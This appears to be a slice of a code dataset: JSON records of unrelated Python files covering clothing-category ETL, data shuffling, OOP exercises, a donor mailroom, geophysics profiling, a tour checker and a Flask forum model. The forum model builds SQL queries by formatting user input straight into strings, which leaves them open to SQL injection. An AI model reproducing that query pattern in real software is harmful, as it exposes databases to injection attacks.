sep='')\n\n # 印出查看目前尚未歸類的粗分類\n unclassified_cats = _get_unclassified_categories(splitted_set, similar_categories)\n if is_show:\n _print_unclassified_categories(splitted_set, similar_categories, unclassified_cats)\n\n # (2) 再透過 manual_def_dict 補償修正:「??廠商分類 應分在 ??自訂分類下(作為子分類)」\n if is_show:\n print(\"===\"*12, \"\\n\", \"2. 歸類補償修正後 (依照手工添加的 manual_def_dict) 補償修正\", \"===\"*12, sep='')\n #for manual_main_cat, manual_sub_cat in manual_def_dict.items():\n for unclassified_cat in unclassified_cats:\n #print(f\"\\\"{unclassified_cat}\\\"\", end=\" \")\n for manual_main_cat, manual_sub_cats in manual_def_dict.items():\n for manual_sub_cat in manual_sub_cats:\n #print(manual_sub_cat)\n if unclassified_cat in manual_sub_cat:\n #similar_categories[manual_main_cat].add(manual_sub_cat)\n similar_categories[f\"{manual_main_cat}類\"].add(manual_sub_cat)\n if is_show:\n print(\"similar_categories:\\n\", similar_categories, \"\\n\", sep='')\n\n '''tmp_cats = [cat.replace(\"類\",\"\") for cat in manual_def_categories]\n for raw_cat in raw_categories:\n if raw_cat in tmp_cats:\n print(similar_categories,\"\\n\\n\")\n '''\n # 印出查看目前尚未歸類的粗分類\n unclassified_cats = _get_unclassified_categories(splitted_set, similar_categories)\n if is_show:\n _print_unclassified_categories(splitted_set, similar_categories, unclassified_cats)\n\n # 若確定 similar_categories 正確,回傳 similar_categories\n return similar_categories\n\ndef _generate_paths():\n # Generate clear path of CSV files for all cloth suppliers\n base_path_1 = \"D:/MyPrograms/Clothes2U/functions/台灣服飾商 ETL/Lativ_Crawler/res2/tier_1.csv\"\n base_path_2 = \"D:/MyPrograms/Clothes2U/functions/台灣服飾商 ETL/Supplier_DB_crawler_v2/output/tier1/csv/\"\n csv_file_names = os.listdir(base_path_2)\n csv_paths = [base_path_1] + [base_path_2+csv_fn for csv_fn in csv_file_names if \"H&M\" not in csv_fn]\n #print(*(f\"({i+1}) {path}\" for i, path in enumerate(csv_paths)), len(csv_paths), \"\\n\", sep=\"\\n\")\n return csv_paths\n\ndef _get_raw_categories():\n # Read all big-categories and put them to 'tmp_list'\n raw_categories = set(category for csv_path in _generate_paths() for category in pd.read_csv(csv_path)[\"category\"])\n #print(raw_categories, len(raw_categories), \"\\n\") # 48=>39( list => set ), 9 duplicated categorie names\n return raw_categories\n\ndef _get_splitted_categories(raw_categories):\n # Splitting some compound categories (which combines many types) into single-term categories\n spliter = \"/\"\n splitted_set = set()\n for cat in raw_categories:\n cat = cat.replace(\"・\",\"/\").replace(\"&\",\"/\")\n if spliter in cat:\n #print(cat.replace(\"&\",\"/\").split(\"/\"))\n [splitted_set.add(cat) for cat in cat.split(\"/\")]\n else:\n splitted_set.add(cat)\n #print(splitted_set, len(splitted_set), \"\\n\") # 39=>43, 4 additional categories appended after splitting categories which combines many types\n return splitted_set\n\ndef _get_unclassified_categories(splitted_set, similar_categories):\n # 回傳當前尚未歸類(進 similar_categories)的粗分類到 existing_cats\n unclassified_cats = splitted_set - set(cat for v in similar_categories.values() for cat in v)\n return unclassified_cats\n\ndef _print_unclassified_categories(splitted_set, similar_categories, unclassified_cats):\n #print(\"existing_cats:\\n\", existing_cats, \"\\n\", sep='')\n\n # 印出查看目前尚未歸類的粗分類\n # 手動確認要增設哪些分類後,可增加自訂新分類到 manual_def_categories\n # 或是增加自訂新從屬階層到 manual_def_dict\n print(\"執行本階段後,尚未歸類的粗分類:\")\n if len(unclassified_cats) > 0:\n print(*(f\"\\'{cat}\\'\" for cat in unclassified_cats), \"\\n\", sep=\"/\")\n else:\n print(\"無\")\n#-----------------------------\ndef get_main_categories(is_show=True):\n '''\n Returns\n -------\n list(similar_categories.keys()): \n\n This func only use 1 other func: 'transform_big_categories_to_uniform'\n to obtain uniform, upper-level categories,\n as the role of FEATURES to help to train classification model.\n '''\n similar_categories = transform_big_categories_to_uniform(is_show)\n #print(similar_categories)\n return list(similar_categories.keys())\n\ndef list_all_combination(is_show=False):\n clothing_color_path = \"./local_data/color_sheet.txt\"\n colors = list()\n with open(clothing_color_path, \"r\") as fp:\n [colors.append(color) for line in fp.readlines()[1:] for color in line.rstrip().split(\":\")[-1].split(\"、\")]\n #print(colors)\n\n main_categories = get_main_categories(is_show=False)\n #print(main_categories)\n\n # 12 categories x 12 colors => 144 sets\n train_feature_combination = [f\"{color}色_{cat}\" for color in colors for cat in main_categories]\n #print(train_feature_combination)\n\n if is_show:\n for i, color_cat in enumerate(train_feature_combination):\n print(f\"{str(i).zfill(6)}_{color_cat}\")\n return train_feature_combination\n\ndef write_all_combination_to_txt():\n train_feature_combination = list_all_combination(is_show=False)\n color_cat_combination_path = \"./local_data/color_category_combination.txt\"\n try:\n with open(color_cat_combination_path, \"w\") as fp:\n tmp = len(train_feature_combination)-1\n for i, color_cat in enumerate(train_feature_combination):\n #print(f\"{str(i).zfill(6)}_{color_cat}\")\n msg = f\"{str(i).zfill(6)}_{color_cat}\"\n msg += \"\\n\" if i != tmp else \"\"\n fp.write(msg)\n\n except Exception as e:\n print(f\"'顏色_服飾分類'txt檔: {color_cat_combination_path} 寫入失敗:\")\n print(str(e))\n else:\n print(f\"'顏色_服飾分類'txt檔: {color_cat_combination_path} 寫入成功!\")\n\ndef query_uniform_category(supplier_category):\n uniform_category = None\n similar_categories = transform_big_categories_to_uniform(False)\n #print(similar_categories)\n for uniform, mixed in similar_categories.items():\n #print(mixed)\n if supplier_category in mixed:\n uniform_category = uniform\n if uniform_category is None:\n print(\"[WARNING] 請檢查程式: `./modules/supplier_utils/uniform_category_transformer.py`\"+\\\n f\"找不到與供應商分類 `{supplier_category}`相應的「統一分類」\")\n return uniform_category \n \nif __name__ == \"__main__\":\n ''' 功能 1: 歸納整理各服飾供應商服飾(粗)分類 '''\n #main_categories = get_main_categories(is_show=True) #顯示過程\n #main_categories = get_main_categories(is_show=False) #不顯示過程\n #print(\"\\n\", \"===\"*12, \"\\n\", \"用來訓練所有的上層分類\", \"===\"*12, \"\\n\", main_categories, \"\\n\", len(main_categories), sep='')\n\n ''' 功能 2: 由特定服飾商 `粗分類` 查詢 `自訂統一分類` '''\n supplier_category = \"配件\"\n print(query_uniform_category(supplier_category))\n\n ''' 功能 3: 列出所有:'顏色_服飾分類'的排列組合,作為查詢關鍵字的輸入\n (E.g., Azure-API 呼叫 => 到 Bing 搜尋 => 送 request 存圖)'''\n\n #list_all_combination(is_show=True)\n\n ''' 功能 4: 儲存所有:'顏色_服飾分類'的排列組合 (不含紀錄) 為 txt檔 '''\n #write_all_combination_to_txt()\n","sub_path":"modules/supplier_utils/uniform_category_transformer.py","file_name":"uniform_category_transformer.py","file_ext":"py","file_size_in_byte":10644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"473439716","text":"#!/usr/bin/env python\n\n# -*- coding: utf-8 -*-\n\"\"\"\n@author: Jifu Zhao\n\"\"\"\n\nimport scipy.io as sio\nfrom signal_functions import randomShuffle\n\n#%% load the data for 30 second from \"./../data/\"\n# backfor30s = 1000back30s, 500backFinal30s, 500back1ThFar30s, 500back1Th30s, 500back2Th30s, \n# 500back1Ra30s, 500back2Ra30s, 500back1U30s, 500back2U30s, 500back1K30s, 500back2K30s\n\nbackfor30s = sio.loadmat('./../data/backfor30s')['backfor30s'] #6000\n\n# shuffle background for 30s (repeated for 3 times)\nback30Shuffled = randomShuffle(backfor30s, dimension=2)\nback30Shuffled = randomShuffle(back30Shuffled, dimension=2)\nback30Shuffled = randomShuffle(back30Shuffled, dimension=2)\n\n# select 80% as train and 20% as test\ntrain30, test30 = randomShuffle(back30Shuffled, dimension=2, delta=0.8)\n\n# save the data\n#sio.savemat('./../data/back30Shuffled.mat', {'back30Shuffled': back30Shuffled})\n#sio.savemat('./../data/train30.mat', {'train30': train30})\n#sio.savemat('./../data/test30.mat', {'test30': test30})\n\n#%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n# load the data for 60 second from \"./../data/\"\nbackfor60s = sio.loadmat('./../data/backfor60s')['backfor60s'] #6000\n\n# shuffle background for 60s (repeated for 3 times)\nback60Shuffled = randomShuffle(backfor60s, dimension=2)\nback60Shuffled = randomShuffle(back60Shuffled, dimension=2)\nback60Shuffled = randomShuffle(back60Shuffled, dimension=2)\n\n# select 80% as train and 20% as test\ntrain60, test60 = randomShuffle(back60Shuffled, dimension=2, delta=0.8)\n\n# save the data\n#sio.savemat('./../data/back60Shuffled.mat', {'back60Shuffled': back60Shuffled})\n#sio.savemat('./../data/train60.mat', {'train60': train60})\n#sio.savemat('./../data/test60.mat', {'test60': test60})\n\n\n","sub_path":"NaI_detector_data/data_process/data_shuffle.py","file_name":"data_shuffle.py","file_ext":"py","file_size_in_byte":1761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"178101871","text":"### 1.\nimport random\nclass Num:\n num_lst = []\n def random_num(self):\n for i in range(10):\n self.num_lst.append(random.randint(100,999))\n\nclass OutputNum(Num):\n def __init__(self):\n self.random_num()\n\n def output_num(self):\n for i in self.num_lst:\n print(i)\nobj = OutputNum()\nobj.output_num()\n\n\n### 2.\nclass School:\n def __init__(self,name,address):\n self.name = name\n self.address = address\n self.teacher_list = []\n\n def add_teacher(self,obj):\n self.teacher_list.append(obj)\n\nclass Teacher:\n def __init__(self,name,course,school):\n self.name = name\n self.course = course\n self.school = school\n\n\nbeijing = School(\"北京校区\",\"美丽的沙河\")\nshenzhen = School(\"深圳校区\",\"南山区\")\n\ntaibai = Teacher(\"太白\",\"python\",beijing)\nwuchao = Teacher(\"吴超\",\"linux\",beijing)\nbaoyuan = Teacher(\"宝元\",\"python\",beijing)\nyuanhao = Teacher(\"苑昊\",\"python\",shenzhen)\nxiaohu = Teacher(\"小虎\",\"linux\",shenzhen)\nxiaowang = Teacher(\"小王\",\"python\",shenzhen)\n\nbeijing.add_teacher(taibai)\nbeijing.add_teacher(baoyuan)\nbeijing.add_teacher(wuchao)\nshenzhen.add_teacher(yuanhao)\nshenzhen.add_teacher(xiaowang)\nshenzhen.add_teacher(xiaohu)\n\n\n\n## 1.1\ntaibai_dic = {\"name\":taibai.name,\"course\":taibai.course,\"school\":taibai.school.name,\"school_address\":taibai.school.address}\nprint(taibai_dic)\n\n## 1.2\nbeijing_teacher = [i.name for i in beijing.teacher_list]\nprint(beijing_teacher)\n\n## 1.3\npython_teacher = [i for i in beijing.teacher_list if i.course == \"python\"] + [i for i in shenzhen.teacher_list if i.course == \"python\"]\nprint(python_teacher)\n\n## 1.4\nlinux_teacher = [i for i in beijing.teacher_list if i.course == \"linux\"] + [i for i in shenzhen.teacher_list if i.course == \"linux\"]\nfor i in linux_teacher:\n print(i)\n\n## 1.5\nimport pickle\nwith open(\"txt\",mode=\"ab\") as f:\n pickle.dump(beijing,f)\n pickle.dump(shenzhen,f)\n\nwith open(\"txt\",mode=\"rb\") as f1:\n while True:\n try:\n obj = pickle.load(f1)\n for i in obj.teacher_list:\n print(i.name)\n except Exception as e:\n break\n\n\n### 3.\nclass People:\n def __init__(self,name,hp,weapon,sex):\n self.name = name\n self.hp = hp\n self.weapon = weapon\n self.sex = sex\n\n\nclass Police(People):\n def attack(self,obj):\n if not isinstance(obj,Police):\n print(f\"警察:{self.name} 用{self.weapon}攻击匪徒:{obj.name},匪徒:{obj.name} 掉血\")\n\nclass Terrorist(People):\n def attack(self,obj):\n if not isinstance(obj,Terrorist):\n print(f\"匪徒:{self.name} 用{self.weapon}攻击警察:{obj.name},警察:{obj.name} 掉血\")\n\na1 = Police(\"xxx\",100,\"手枪\",\"男\")\na2 = Police(\"sss\",100,\"狙击枪\",\"女\")\nb1 = Terrorist(\"yyy\",100,\"冲锋枪\",\"男\")\nb2 = Terrorist(\"ooo\",100,\"步枪\",\"女\")\n\na1.attack(b1)\na1.attack(a2)\nb2.attack(b1)\n","sub_path":"测试/测试三/刘桂祥.py","file_name":"刘桂祥.py","file_ext":"py","file_size_in_byte":2928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"61356239","text":"#!/usr/bin/env python3\n\nimport re\n\ndonors = {'Bob Barker': {'donations': 2, 'total': 24456.24},\n 'Roger Rabbit': {'donations': 1, 'total': 4930.26},\n 'Bruce Lee': {'donations': 3, 'total': 52246.75},\n 'Frodo Baggins': {'donations': 1, 'total': 1249.44},\n 'Kermit the Frog': {'donations': 2, 'total': 23475.20}}\n\n# prints a main menu\ndef show_main_menu():\n print(\"-\" * 70)\n for number, func in menu_opts.items():\n print(f'{number}. {menu_opts_text[func]}')\n\n# gets a menu selection\ndef get_main_selection():\n user_in = \"\"\n while user_in == \"\":\n show_main_menu()\n user_in = input(\"Enter a menu number: \")\n if user_in not in menu_opts.keys():\n print(\"Invalid selection. Enter a menu selection:\", list(menu_opts.keys()))\n user_in = \"\"\n return user_in\n\n# logic for inputting a new donation\ndef send_thankyou():\n user_in = \"\"\n names = list(donors.keys())\n while user_in == \"\":\n print(\"----------------------------------------------------------------\")\n user_in = input(\"Enter a full name or type 'list' for a list of names: \")\n if user_in == 'list':\n print(\"Donors: \")\n for name in names:\n print(\" \" + name)\n user_in = \"\"\n elif user_in not in names:\n donors[user_in] = {'donations': 0, 'total': 0}\n amount = float(input(\"Enter a donation amount: \"))\n donors[user_in]['donations'] += 1\n donors[user_in]['total'] += amount\n output_thankyou(user_in, amount)\n\n# print a report\ndef output_report():\n table_headerfmt = \"{:<19s}|{:>15s} |{:>14s} |{:>15s}\"\n table_formatter = \"{:<19s} ${:13.2f} {:14d} ${:13.2f}\"\n table_seperator = \"-\" * 68\n print(table_headerfmt.format(\"Donor Name\", \"Total Given\", \"Num Gifts\", \"Average Gift\"))\n print(table_seperator)\n\n # unpack to a list of lists\n donor_list = []\n for donor in donors:\n donor_list.insert(0, [donor, donors[donor]['donations'], donors[donor]['total']])\n\n # sort the list\n donor_list = sorted(donor_list, key = lambda x: x[2] * -1)\n\n # print the list\n for donor in donor_list:\n print(table_formatter.format(donor[0], donor[2], donor[1], donor[2] / donor[1]))\n\n# print a thank you for a recent donation\ndef output_thankyou(donor_name, latest_amount):\n print(generate_thankyou(donor_name, latest_amount, True))\n\n# write a thank you note to disk for a donor\ndef write_letters():\n for donor_name in donors.keys():\n # convert any non-alphanumeric characters to _ for the filename\n donor_file = re.sub(r\"[^a-zA-Z0-9_-]+\", \"_\", donor_name) + \".txt\"\n\n note = generate_thankyou(donor_name)\n f = open(donor_file, 'w')\n f.write(note)\n f.close()\n print(f'>>> Wrote thank you note for {donor_name} to {donor_file}')\n\n# generate a thank you note for a donor\ndef generate_thankyou(donor_name, latest_amount=0, recent=False):\n donations_total = donors[donor_name][\"total\"]\n donations_count = donors[donor_name][\"donations\"]\n format_values = {'donations_total': donations_total,\n 'donations_count': donations_count,\n 'donor_name': donor_name,\n 'latest_amount': latest_amount}\n if recent:\n template = '''----------------------------------------------------------------------\nDear {donor_name},\n Thank you for your generous donation of {latest_amount:.2f}!\nThat brings your total of {donations_count} donation(s) to ${donations_total:.2f}\nSincerely,\n -Me\n'''\n else:\n template = '''----------------------------------------------------------------------\nDear {donor_name},\n Thank you for all {donations_count} of your generous donations for a total of {donations_total:.2f}!\nWe will put the money to good use.\nSincerely,\n -Me\n'''\n letter = template.format(**format_values)\n return(letter)\n\n# the main loop\ndef main():\n selection = \"2\"\n while menu_opts[selection] != quit:\n selection = get_main_selection()\n menu_opts[selection]()\n\n# a dict for mapping user selection to functions\nmenu_opts = {'1': send_thankyou,\n '2': output_report,\n '3': write_letters,\n '4': quit}\nmenu_opts_text = {send_thankyou: \"Send a Thank You to a single donor.\",\n output_report: \"Create a report.\",\n write_letters: \"Send letters to all donors.\",\n quit: \"Quit.\"}\n\nif __name__ == '__main__':\n main()\n","sub_path":"students/aaron/homework_lesson4/mailroom_v2.py","file_name":"mailroom_v2.py","file_ext":"py","file_size_in_byte":4312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"216249985","text":"#!/usr/bin/env python3\n'''\n## interseis_lib.py\n\nLibrary of python functions to be used with interseismic_practical.ipynb.\n\n'''\n\n# packages\nimport subprocess as subp\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.path as path\n\n#-------------------------------------------------------------------------------\n\ndef screw_disc(x, s, d, c):\n '''\n Function to calculate displacements/velocities due to slip on a deep \n screw dislocation (infinitely long strike slip fault. \n After Savage and Burford (1973).\n v = (s/pi)*arctan(x/d)\n\n INPUTS\n x = vector of distances from fault\n s = slip or slip rate on deep dislocation\n d = locking depth [same units as x]\n c = scalar offset in y [same unit as s]\n OUTPUTS\n v = vector of displacements or velocities at locations defined by x\n [same units as s]\n \n USEAGE:\n v = deepdisloc(x, s, d)\n\n '''\n \n v = (s/np.pi) * np.arctan(x/d) + c\n \n return v\n\n\n#-------------------------------------------------------------------------------\n\ndef loglike(x, v, m, W):\n '''\n INPUTS\n x = vector of distances from fault\n v = velocities at locations defined by x\n m = model parameters, [0] = slip (mm/yr), [1] = locking depth (km), [2] = scalar offset (mm/yr)\n W = weight matrix (inverse of the VCM)\n OUTPUTS\n ll = value of the loglikelihood function\n '''\n \n m = m * np.array([0.001, 1000, 0.001])\n \n #ll = np.sum((np.transpose(v-screw_disc(x, m[0], m[1], m[2]))*W*(v-screw_disc(x, m[0], m[1], m[2]))));\n ll = np.sum(0.001*(np.transpose(v-screw_disc(x, m[0], m[1], m[2]))*W*(v-screw_disc(x, m[0], m[1], m[2]))));\n \n return ll\n\n#-------------------------------------------------------------------------------\n\ndef logprior(m,m_min,m_max):\n '''\n INPUTS\n m = model values\n m_min = lower model limits\n m_max = upper model limits\n OUTPUTS\n lp = true if within limits, false if any aren't\n '''\n \n lp = np.all(np.all(m>=m_min) & np.all(m<=m_max))\n \n return lp\n\n#-------------------------------------------------------------------------------\n\ndef rms_misfit(a,b):\n '''\n INPUTS\n a,b = two arrays of same length\n OUTPUTS\n rms = rms misfit between a and b (a-b)\n '''\n \n rms = np.sqrt(np.mean((a-b)**2))\n \n return rms\n\n#-------------------------------------------------------------------------------\n\ndef get_par(par_file,par_name):\n '''\n INPUTS\n par_file = name of param file (str)\n par_name = name of desired par (str)\n OUTPUTS\n par_val = value of param for par file\n '''\n \n par_val = subp.check_output(['grep', par_name, par_file]).decode().split()[1].strip()\n return par_val\n\n#-------------------------------------------------------------------------------\n\ndef profile_data(x,y,data,prof_start,prof_end,params):\n \n '''\n Generates a profile through gridded data.\n \n INPUTS:\n data = numpy array of values to profile\n x = vector of coords for the x axis\n y = vector of coords for the y axis\n prof_start = (x, y) pair for the start of the profile line\n prof_end = (x, y) pair for the end of the profile line\n params = dictionary of parameters for the profiler (currently nbins and width)\n \n '''\n \n xx,yy = np.meshgrid(x,y)\n \n prof_start = np.array(prof_start)\n prof_end = np.array(prof_end)\n \n # Profile dimensions relative to profile itself\n prof_dist = np.sqrt((prof_start[1]-prof_end[1])**2 + (prof_start[0]-prof_end[0])**2)\n prof_bin_edges = np.linspace(0, prof_dist ,params[\"nbins\"]+1) \n prof_bin_mids = (prof_bin_edges[:-1] + prof_bin_edges[1:]) / 2\n \n # Profile points in lat long space\n bin_mids = np.linspace(0,1,params[\"nbins\"]+1)\n bin_grad = prof_end - prof_start\n x_mids = prof_start[0] + (bin_mids * bin_grad[0])\n y_mids = prof_start[1] + (bin_mids * bin_grad[1])\n \n # Gradient of line perpendicular to profile\n bin_grad_norm = (params[\"width\"]/2) * bin_grad / np.linalg.norm(bin_grad)\n \n # Corner points of bins\n bin_x1 = x_mids + bin_grad_norm[1]\n bin_x2 = x_mids - bin_grad_norm[1]\n bin_y1 = y_mids - bin_grad_norm[0]\n bin_y2 = y_mids + bin_grad_norm[0]\n \n # Pre-allocate outputs\n bin_val = np.zeros_like((bin_x1[:-1]))\n bin_std = np.zeros_like(bin_val)\n \n # Trim data set to points inside any bin (improves run time)\n full_poly = path.Path([(bin_x1[0], bin_y1[0]), (bin_x1[-1], bin_y1[-1]), (bin_x2[-1], bin_y2[-1]), (bin_x2[0], bin_y2[0])])\n poly_points = full_poly.contains_points(np.transpose([xx.flatten(),yy.flatten()]))\n poly_points = poly_points.reshape(data.shape)\n trim_data = data[poly_points]\n trim_xx = xx[poly_points]\n trim_yy = yy[poly_points]\n \n # Loop through each bin identifying the points that they contain\n for ii in range(0,params[\"nbins\"]):\n \n poly_x = np.array([bin_x1[ii], bin_x1[ii+1], bin_x2[ii+1], bin_x2[ii]]);\n poly_y = np.array([bin_y1[ii], bin_y1[ii+1], bin_y2[ii+1], bin_y2[ii]]);\n \n poly = path.Path([(poly_x[0], poly_y[0]), (poly_x[1], poly_y[1]), (poly_x[2], poly_y[2]), (poly_x[3], poly_y[3])])\n \n poly_points = poly.contains_points(np.transpose([trim_xx,trim_yy]))\n \n in_poly_vals = trim_data[poly_points]\n\n bin_val[ii] = np.nanmean(in_poly_vals)\n \n # get point cloud\n poly_x = np.array([bin_x1[0], bin_x1[-1], bin_x2[-1], bin_x2[0]])\n poly_y = np.array([bin_y1[0], bin_y1[-1], bin_y2[-1], bin_y2[0]])\n points_poly = np.vstack((poly_x,poly_y)).T\n points_poly = np.vstack((points_poly,np.array([points_poly[0,0],points_poly[0,1]])))\n \n poly = path.Path([(poly_x[0], poly_y[0]), (poly_x[1], poly_y[1]), (poly_x[2], poly_y[2]), (poly_x[3], poly_y[3])])\n poly_points = poly.contains_points(np.transpose([trim_xx,trim_yy]))\n points_val = trim_data[poly_points]\n points_x = trim_xx[poly_points]\n points_y = trim_yy[poly_points]\n \n prof_m = (prof_start[1] - prof_end[1]) / (prof_start[0] - prof_end[0])\n points_m = (prof_start[1] - points_y) / (prof_start[0] - points_x)\n points_prof_angle = np.arctan((points_m - prof_m) / (1 + prof_m * points_m))\n points2prof_start = np.sqrt((prof_start[1] - points_y)**2 + (prof_start[0] - points_x)**2)\n points_dist = points2prof_start * np.cos(points_prof_angle)\n \n return bin_val, prof_bin_mids, points_val, points_dist, points_poly","sub_path":"interseis_lib.py","file_name":"interseis_lib.py","file_ext":"py","file_size_in_byte":6580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"58721155","text":"import sys\nimport os\nimport re\nfrom pathlib import Path\n\n\ndef get_line_contains_idx(substr, lines):\n idx = -1\n for line in lines:\n if line.startswith(substr):\n idx = lines.index(line)\n \n return idx\n\n\ndef convert_wight_section(text, isSop):\n orderings = []\n lines = text.split(\"\\n\")\n idx = get_line_contains_idx(\"EDGE_WEIGHT_SECTION\", lines)\n if isSop:\n del lines[idx + 1]\n \n dims_idx = get_line_contains_idx(\"DIMENSION\", lines)\n sets_idx = get_line_contains_idx(\"GTSP_SETS\", lines)\n\n if idx == -1 or dims_idx == -1:\n return text, orderings\n\n dims = int(lines[dims_idx].split(\" : \")[1])\n for i in range(idx + 1, idx + dims + 1):\n strip_str = lines[i].strip()\n strip_str = re.sub('\\s+', ' ', strip_str)\n float_lst = list(map(float, strip_str.split(' ')))\n tmplst = []\n for vert_idx, fl in enumerate(float_lst):\n if fl == -1:\n tmplst.append(vert_idx + 1)\n \n orderings.append(tmplst)\n lines[i] = strip_str\n \n return \"\\n\".join(lines), orderings\n\n\ndef read_mat(text):\n lines = text.split(\"\\n\")\n idx = get_line_contains_idx(\"EDGE_WEIGHT_SECTION\", lines)\n dims_idx = get_line_contains_idx(\"DIMENSION\", lines)\\\n\n if idx == -1 or dims_idx == -1:\n return []\n \n dist_mat = []\n dims = int(lines[dims_idx].split(\" : \")[1])\n for i in range(idx + 1, idx + dims + 1):\n strip_str = lines[i].strip()\n strip_str = re.sub('\\s+', ' ', strip_str)\n float_lst = list(map(float, strip_str.split(' ')))\n dist_arr = []\n for vert_idx, fl in enumerate(float_lst):\n dist_arr.append(round(fl))\n dist_mat.append(dist_arr)\n \n return dist_mat\n\n\ndef check_tour(filename, tour):\n if not filename.endswith(\".pcglns\"):\n print(\"Wrong file format\")\n return\n \n inst_file = open(filename, \"r\")\n text = inst_file.read()\n inst_file.close()\n dist_mat = read_mat(text)\n sum = 0\n for i in range(len(tour) - 1):\n # print(str(dist_mat[tour[i] - 1][tour[i + 1] - 1]) + \"\\n\")\n if (dist_mat[tour[i] - 1][tour[i + 1] - 1] == -1):\n print(\"Found -1 dist\")\n exit(0)\n \n sum += dist_mat[tour[i] - 1][tour[i + 1] - 1]\n\n if (dist_mat[tour[len(tour) - 1] - 1][tour[0] - 1] != -1):\n sum += dist_mat[tour[len(tour) - 1] - 1][tour[0] - 1]\n\n return sum\n\n\n\nif __name__ == \"__main__\":\n argc = len(sys.argv)\n print(str(argc))\n if argc != 3:\n print(\"Wrong arguments number\")\n exit(0)\n \n input_file = sys.argv[1]\n tour = eval(sys.argv[2])\n\n sum = check_tour(input_file, tour)\n print(\"Length:\", sum, \"tour:\", tour)","sub_path":"checkTour.py","file_name":"checkTour.py","file_ext":"py","file_size_in_byte":2733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"428654","text":"#-*- coding: UTF-8 -*-\r\nfrom flask import g\r\n\r\nclass Topic:\r\n\r\n# GET\r\n\r\n # get a topic\r\n @staticmethod\r\n def get_topic(topic_id):\r\n query = '''SELECT topic.TopicID, topic.Title, topic.Content, topic.CommentNum, topic.Time, topic.ClickNum, node.Name AS NodeName, node.Abbr AS NodeAbbr, node.NodeID, user.Name AS UserName, user.Abbr AS UserAbbr, user.Avatar, user.UserID\\n\r\n FROM topic, user, node\\n\r\n WHERE topic.UserID = user.UserID\\n\r\n AND topic.NodeID = node.NodeID\\n\r\n AND topic.TopicID = %d''' % topic_id\r\n g.cursor.execute(query)\r\n return g.cursor.fetchone()\r\n\r\n # get topics\r\n @staticmethod\r\n def get_topics(num):\r\n query = '''SELECT topic.TopicID, topic.Title, topic.CommentNum, topic.Time, node.NodeID, node.Name AS NodeName, node.Abbr AS NodeAbbr, user.Name AS UserName, user.Abbr AS UserAbbr, user.Avatar\\n\r\n FROM topic, user, node\\n\r\n WHERE topic.UserID = user.UserID\\n\r\n AND topic.NodeID = node.NodeID\\n\r\n ORDER BY Time DESC LIMIT %d''' % num\r\n g.cursor.execute(query)\r\n return g.cursor.fetchall()\r\n\r\n # get topics by user\r\n @staticmethod\r\n def get_topics_by_user(user_id, page, num):\r\n query = '''SELECT topic.TopicID, topic.Title, topic.CommentNum, topic.Time, node.NodeID, node.Name AS NodeName, node.Abbr AS NodeAbbr, user.Name AS UserName, user.Abbr AS UserAbbr, user.Avatar\\n\r\n FROM topic, user, node\\n\r\n WHERE topic.UserID = user.UserID\\n\r\n AND topic.NodeID = node.NodeID\\n\r\n AND topic.UserID = %d\r\n ORDER BY Time DESC LIMIT %d, %d''' % (user_id, (page-1)*num, num)\r\n g.cursor.execute(query)\r\n return g.cursor.fetchall()\r\n\r\n # get topics num by user\r\n @staticmethod\r\n def get_topics_num_by_user(user_id):\r\n query = \"SELECT COUNT(*) AS TopicsNum FROM topic WHERE topic.UserID = %d\" % user_id\r\n g.cursor.execute(query)\r\n return g.cursor.fetchone()['TopicsNum']\r\n\r\n # get hot topics\r\n @staticmethod\r\n def get_hot_topics(num):\r\n query = '''SELECT topic.TopicID, topic.Title, user.Abbr AS UserAbbr, user.Avatar\\n\r\n FROM topic, user\\n\r\n WHERE topic.UserID = user.UserID\\n\r\n ORDER BY topic.CommentNum DESC LIMIT %d''' % num\r\n g.cursor.execute(query)\r\n return g.cursor.fetchall()\r\n\r\n # get topics by node\r\n @staticmethod\r\n def get_topics_by_node(node_abbr):\r\n query = '''SELECT topic.TopicID, topic.Title, topic.CommentNum, topic.Time, node.NodeID, node.Name AS NodeName, node.Abbr AS NodeAbbr, user.Name AS UserName, user.Abbr AS UserAbbr, user.Avatar\\n\r\n FROM topic, user, node\\n\r\n WHERE topic.UserID = user.UserID\\n\r\n AND topic.NodeID = node.NodeID\r\n AND node.Abbr = '%s'\\n\r\n ORDER BY Time DESC''' % node_abbr\r\n g.cursor.execute(query)\r\n return g.cursor.fetchall()\r\n\r\n# NEW\r\n\r\n # add topic\r\n @staticmethod\r\n def add(node_id, title, content, user_id):\r\n query = \"INSERT INTO topic (NodeID, Title, Content, UserID) VALUES (%d, '%s', '%s', %d)\" % (node_id, title, content, user_id)\r\n g.cursor.execute(query)\r\n g.conn.commit()\r\n return g.cursor.lastrowid\r\n\r\n# UPDATE\r\n\r\n # edit topic\r\n @staticmethod\r\n def edit(topic_id, node_id, title, content):\r\n query = \"UPDATE topic SET NodeID = %d, Title = '%s', Content = '%s' WHERE TopicID = %d\" % (node_id, title, content, topic_id)\r\n g.cursor.execute(query)\r\n return g.conn.commit()\r\n\r\n # add click num\r\n @staticmethod\r\n def add_click_num(topic_id):\r\n query = \"UPDATE topic SET ClickNum = ClickNum + 1 WHERE TopicID = %d\" % topic_id\r\n g.cursor.execute(query)\r\n return g.conn.commit()\r\n\r\n # add comment num\r\n @staticmethod\r\n def add_comment_num(topic_id):\r\n query = \"UPDATE topic SET CommentNum = CommentNum + 1 WHERE TopicID = %d\" % topic_id\r\n g.cursor.execute(query)\r\n return g.conn.commit()","sub_path":"xichuangzhu/models/topic_model.py","file_name":"topic_model.py","file_ext":"py","file_size_in_byte":4083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"365877740","text":"from State import *\nfrom Utils import *\nimport time\n\n\ndef aStar(state: State, N: int):\n root = Node(state)\n stack = [root]\n tree = Tree(root)\n\n root.heuristics = h1(state.board) + 